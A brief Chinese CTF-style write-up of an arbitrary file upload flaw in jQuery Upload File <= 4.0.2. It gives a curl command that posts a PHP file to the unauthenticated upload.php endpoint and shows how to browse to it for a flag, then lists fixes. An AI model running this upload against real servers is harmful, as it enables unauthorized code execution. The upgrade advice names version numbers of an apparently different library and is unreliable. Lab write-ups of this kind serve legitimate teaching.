0x01 漏洞描述
jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。 jQuery Upload File <= 4.0.2 中的任意文件上传 根目录下/jquery-upload-file
0x02 影响范围
<= 4.0.2
0x03 漏洞复现
1、进入的页面
2、准备一个 php 文件
php
<?php phpinfo(); ?>3、通过虚拟机上传(把文件放进虚拟机里,并执行以下命令)
bash
curl -F "myfile=@sh.php" "http://ip:端口/jquery-upload-file/php/upload.php"
4、浏览器访问路径
http://ip:port/jquery-upload-file/php/uploads/sh.php
Ctrl + F 搜 flag 关键字,即可获得 flag
0x04 漏洞修复
升级 jQuery File Upload 到官方安全版本(推荐 10.x 或至少 9.22.1+)
删除或禁用官方 demo 中不安全的上传处理代码(如 server/php/)
服务端限制上传文件类型,禁止上传可执行脚本(如 .php, .jsp 等)
上传接口必须设置身份认证或权限控制,禁止未授权访问